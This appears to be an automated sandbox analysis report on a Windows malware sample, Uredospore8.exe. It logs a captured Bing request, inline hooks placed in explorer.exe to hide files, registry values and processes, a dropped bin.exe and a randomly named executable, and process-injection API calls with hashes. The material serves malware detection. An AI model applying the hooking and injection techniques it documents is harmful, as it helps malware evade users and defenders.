            0192.168.2.649715173.222.162.644434964C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            TimestampBytes transferredDirectionData
            2024-08-29 18:36:14 UTC2256OUTPOST /threshold/xls.aspx HTTP/1.1
            Origin: https://www.bing.com
            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
            Accept: */*
            Accept-Language: en-CH
            Content-type: text/xml
            X-Agent-DeviceId: 01000A410900C4F3
            X-BM-CBT: 1696488253
            X-BM-DateFormat: dd/MM/yyyy
            X-BM-DeviceDimensions: 784x984
            X-BM-DeviceDimensionsLogical: 784x984
            X-BM-DeviceScale: 100
            X-BM-DTZ: 120
            X-BM-Market: CH
            X-BM-Theme: 000000;0078d7
            X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
            X-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581D
            X-Device-isOptin: false
            X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
            X-Device-OSSKU: 48
            X-Device-Touch: false
            X-DeviceID: 01000A410900C4F3
            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-c
            X-MSEdge-ExternalExpType: JointCoord
            X-PositionerType: Desktop
            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
            X-Search-CortanaAvailableCapabilities: None
            X-Search-SafeSearch: Moderate
            X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
            X-UserAgeClass: Unknown
            Accept-Encoding: gzip, deflate, br
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
            Host: www.bing.com
            Content-Length: 516
            Connection: Keep-Alive
            Cache-Control: no-cache
            Cookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
            2024-08-29 18:36:14 UTC1OUTData Raw: 3c
            Data Ascii: <
            2024-08-29 18:36:14 UTC515OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 38 31 43 36 31 45 30 39 34 39 38 44 34 31 43 43 39 37 43 44 42 42 41 33 35 34 38 32 34 45 44 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 33 35 31 41 41 38 32 41 45 39 30 43 34 36 36 39 39 46 35 42 31 46 45 33 34 32 42 45 37 45 31 30 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
            Data Ascii: ClientInstRequest><CID>81C61E09498D41CC97CDBBA354824ED1</CID><Events><E><T>Event.ClientInst</T><IG>351AA82AE90C46699F5B1FE342BE7E10</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
            2024-08-29 18:36:14 UTC480INHTTP/1.1 204 No Content
            Access-Control-Allow-Origin: *
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            X-MSEdge-Ref: Ref A: 369206E49A994EACA6AC83DE516496E7 Ref B: LAX311000108047 Ref C: 2024-08-29T18:36:14Z
            Date: Thu, 29 Aug 2024 18:36:14 GMT
            Connection: close
            Alt-Svc: h3=":443"; ma=93600
            X-CDN-TraceID: 0.24a6dc17.1724956574.147475df


            Code Manipulations

            Function NameHook TypeActive in Processes
            ZwResumeThreadINLINEexplorer.exe
            NtQueryDirectoryFileINLINEexplorer.exe
            ZwEnumerateValueKeyINLINEexplorer.exe
            NtResumeThreadINLINEexplorer.exe
            ZwCreateUserProcessINLINEexplorer.exe
            NtEnumerateValueKeyINLINEexplorer.exe
            NtCreateUserProcessINLINEexplorer.exe
            ZwQueryDirectoryFileINLINEexplorer.exe
            Function NameHook TypeNew Data
            ZwResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
            NtQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91
            ZwEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
            NtResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
            ZwCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
            NtEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
            NtCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
            ZwQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91

            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:14:35:53
            Start date:29/08/2024
            Path:C:\Users\user\Desktop\Uredospore8.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\Uredospore8.exe"
            Imagebase:0x400000
            File size:69'632 bytes
            MD5 hash:50C7CE412D99EB4769411D6B60A34AC6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:14:36:03
            Start date:29/08/2024
            Path:C:\Users\user\Desktop\Uredospore8.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\Uredospore8.exe"
            Imagebase:0x400000
            File size:69'632 bytes
            MD5 hash:50C7CE412D99EB4769411D6B60A34AC6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:14:36:03
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\winver.exe
            Wow64 process (32bit):true
            Commandline:winver
            Imagebase:0xff0000
            File size:57'344 bytes
            MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:4
            Start time:14:36:03
            Start date:29/08/2024
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff609140000
            File size:5'141'208 bytes
            MD5 hash:662F4F92FDE3557E86D110526BB578D5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:5
            Start time:14:36:05
            Start date:29/08/2024
            Path:C:\Windows\System32\sihost.exe
            Wow64 process (32bit):false
            Commandline:sihost.exe
            Imagebase:0x7ff6440e0000
            File size:111'616 bytes
            MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:6
            Start time:14:36:06
            Start date:29/08/2024
            Path:C:\Windows\System32\svchost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            Imagebase:0x7ff7403e0000
            File size:55'320 bytes
            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:14:36:06
            Start date:29/08/2024
            Path:C:\Windows\System32\svchost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
            Imagebase:0x7ff7403e0000
            File size:55'320 bytes
            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:8
            Start time:14:36:06
            Start date:29/08/2024
            Path:C:\Windows\System32\ctfmon.exe
            Wow64 process (32bit):false
            Commandline:"ctfmon.exe"
            Imagebase:0x7ff796d20000
            File size:11'264 bytes
            MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:9
            Start time:14:36:07
            Start date:29/08/2024
            Path:C:\Windows\System32\svchost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
            Imagebase:0x7ff7403e0000
            File size:55'320 bytes
            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:10
            Start time:14:36:07
            Start date:29/08/2024
            Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
            Imagebase:0x7ff733150000
            File size:793'416 bytes
            MD5 hash:5CDDF06A40E89358807A2B9506F064D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:11
            Start time:14:36:09
            Start date:29/08/2024
            Path:C:\Windows\System32\RuntimeBroker.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
            Imagebase:0x7ff6ae840000
            File size:103'288 bytes
            MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:13
            Start time:14:36:10
            Start date:29/08/2024
            Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            Imagebase:0x7ff7bfd80000
            File size:3'671'400 bytes
            MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:15
            Start time:14:36:11
            Start date:29/08/2024
            Path:C:\Windows\System32\dllhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            Imagebase:0x7ff642ec0000
            File size:21'312 bytes
            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            Target ID:16
            Start time:14:36:20
            Start date:29/08/2024
            Path:C:\Windows\System32\RuntimeBroker.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
            Imagebase:0x7ff6ae840000
            File size:103'288 bytes
            MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:17
            Start time:14:36:20
            Start date:29/08/2024
            Path:C:\Windows\System32\RuntimeBroker.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
            Imagebase:0x7ff6ae840000
            File size:103'288 bytes
            MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:18
            Start time:14:36:21
            Start date:29/08/2024
            Path:C:\Windows\System32\smartscreen.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\smartscreen.exe -Embedding
            Imagebase:0x7ff77db50000
            File size:2'378'752 bytes
            MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:19
            Start time:14:36:22
            Start date:29/08/2024
            Path:C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
            Imagebase:0x400000
            File size:69'632 bytes
            MD5 hash:73120A9C2658CFAB57CF191468A630A5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Has exited:true

            Target ID:20
            Start time:14:36:22
            Start date:29/08/2024
            Path:C:\Windows\System32\ApplicationFrameHost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
            Imagebase:0x7ff65c4c0000
            File size:78'456 bytes
            MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:21
            Start time:14:36:24
            Start date:29/08/2024
            Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
            Imagebase:0x7ff7f0f30000
            File size:19'456 bytes
            MD5 hash:6C44453CD661FC2DB18E4C09C4940399
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:22
            Start time:14:36:25
            Start date:29/08/2024
            Path:C:\Windows\System32\RuntimeBroker.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
            Imagebase:0x7ff6ae840000
            File size:103'288 bytes
            MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:23
            Start time:14:36:25
            Start date:29/08/2024
            Path:C:\Windows\System32\svchost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
            Imagebase:0x7ff7403e0000
            File size:55'320 bytes
            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:24
            Start time:14:36:26
            Start date:29/08/2024
            Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
            Imagebase:0x7ff65b490000
            File size:19'232 bytes
            MD5 hash:F050189D49E17D0D340DE52E9E5B711F
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:25
            Start time:14:36:28
            Start date:29/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0x4
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:26
            Start time:14:36:28
            Start date:29/08/2024
            Path:C:\Windows\System32\backgroundTaskHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
            Imagebase:0x7ff76ba30000
            File size:19'776 bytes
            MD5 hash:DA7063B17DBB8BBB3015351016868006
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:14:36:29
            Start date:29/08/2024
            Path:C:\Windows\System32\RuntimeBroker.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
            Imagebase:0x7ff6ae840000
            File size:103'288 bytes
            MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:14:36:30
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:30
            Start time:14:36:30
            Start date:29/08/2024
            Path:C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
            Imagebase:0x400000
            File size:69'632 bytes
            MD5 hash:73120A9C2658CFAB57CF191468A630A5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:31
            Start time:14:36:30
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:32
            Start time:14:36:30
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:33
            Start time:14:36:31
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:34
            Start time:14:36:33
            Start date:29/08/2024
            Path:C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
            Imagebase:0x400000
            File size:69'632 bytes
            MD5 hash:73120A9C2658CFAB57CF191468A630A5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:35
            Start time:14:36:33
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:36
            Start time:14:36:33
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:37
            Start time:14:36:34
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:38
            Start time:14:36:34
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:39
            Start time:14:36:35
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Target ID:40
            Start time:14:36:35
            Start date:29/08/2024
            Path:C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe"
            Imagebase:0x180000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:5.6%
              Dynamic/Decrypted Code Coverage:91.1%
              Signature Coverage:60%
              Total number of Nodes:45
              Total number of Limit Nodes:3
              execution_graph 1993 401200 #100 1994 40120c 1993->1994 1996 4015e1 1994->1996 1997 4030cd GetPEB 1994->1997 1998 403f25 1997->1998 2001 4039a5 1998->2001 2003 4039db 2001->2003 2002 403a34 2003->2002 2006 403b97 2003->2006 2007 403c1a VirtualAlloc 2006->2007 2009 403e87 2007->2009 2009->2009 2010 40cfa0 2011 40cfe3 15 API calls 2010->2011 2020 409744 2011->2020 2021 40974d 2020->2021 2048 700b10 2049 700b16 2048->2049 2052 7002ae GetPEB 2049->2052 2051 700b28 2052->2051 2037 4030c1 2038 4030c5 2037->2038 2038->2038 2039 4030d0 GetPEB 2038->2039 2040 403f25 2039->2040 2041 4039a5 VirtualAlloc 2040->2041 2042 403f22 2041->2042 2042->2042 2046 700d34 GetPEB 2047 700d45 2046->2047 2022 4039a5 2024 4039db 2022->2024 2023 403a34 2024->2023 2025 403b97 VirtualAlloc 2024->2025 2026 403f0f 2025->2026 2026->2026 2027 7005bc 2033 700283 2027->2033 2030 700f76 2035 700655 NtWriteVirtualMemory 2030->2035 2034 700288 ReadProcessMemory NtWriteVirtualMemory NtWriteVirtualMemory NtWriteVirtualMemory 2033->2034 2034->2030 2036 700f82 2035->2036 2043 4010cc 2044 4010d0 __vbaChkstk 2043->2044 2045 401111 _adj_fdivr_m32 2043->2045 2044->2045 2053 4015ef 2055 40160e 2053->2055 2054 4030cd 2 API calls 2054->2055 2055->2054 2056 4016e1 2055->2056

              Control-flow Graph

              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 007005DA
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 007005FB
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0070062B
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0070064D
                • Part of subcall function 00700655: NtWriteVirtualMemory.NTDLL(?,?,00700F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0070066F
              Memory Dump Source
              • Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd
              Similarity
              • API ID: Memory$VirtualWrite$ProcessRead
              • String ID:
              • API String ID: 2369493071-0
              • Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction ID: 0c97f880734d4ab1c25f3b1b2600d48d0f88ddb6c8c73f2c79bac5f9af469923
              • Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction Fuzzy Hash: 3C111EB0380745FBE7209F45CCC5F96B765FF08300F544224BB085A292CB757964DB95
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID: #100
              • String ID: VB5!6&*
              • API String ID: 1341478452-3593831657
              • Opcode ID: 5bfbbd12606dd50e58570d659215e4fe04599de5ad0ca88f87aebfa80355d611
              • Instruction ID: 370cdd00e1117dfb613e7187a89d158553f8b934a7d660418ea53e2684d9436a
